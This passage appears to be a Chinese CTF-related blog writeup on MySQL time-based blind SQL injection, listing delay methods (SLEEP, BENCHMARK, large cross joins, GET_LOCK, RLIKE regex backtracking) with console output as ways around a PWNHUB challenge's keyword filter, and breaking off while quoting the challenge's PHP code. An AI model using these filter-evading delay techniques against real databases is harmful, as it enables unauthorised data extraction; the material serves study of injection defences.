mysql基于时间盲注_MySQL基于时间盲注（Time-Based Blind SQL Injection）五种延时方法...

PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数，引发对时间盲注中延时方法的思考。

延时函数

SLEEP

mysql> select sleep(5);

+----------+

| sleep(5) |

+----------+

| 0 |

+----------+

1 row in set (5.00 sec)

BENCHMARK

mysql> select benchmark(10000000,sha(1));

+----------------------------+

| benchmark(10000000,sha(1)) |

+----------------------------+

| 0 |

+----------------------------+

1 row in set (2.79 sec)

mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;

+------------+

| count(*) |

+------------+

| 2651020120 |

+------------+

1 row in set (1 min 51.05 sec)

GET_LOCK Writeup

延时精确可控，利用环境有限，需要开两个session测试。

SESSION A

mysql> select get_lock('test',1);

+--------------------+

| get_lock('test',1) |

+--------------------+

| 1 |

+--------------------+

1 row in set (0.00 sec)

SESSION B

mysql> select get_lock('test',5);

+--------------------+

| get_lock('test',5) |

+--------------------+

| 0 |

+--------------------+

1 row in set (5.00 sec)

RLIKE

通过rpad或repeat构造长字符串，加以计算量大的pattern，通过repeat的参数可以控制延时长短。

mysql> select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');

+-------------------------------------------------------------+

| rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b') |

+-------------------------------------------------------------+

| 0 |

+-------------------------------------------------------------+

1 row in set (5.27 sec)

PWNHUB-全宇宙最简单的PHP-Writeup

require 'conn.php';

$id = $_GET['id'];

if(preg_match("/(sleep|benchmark|outf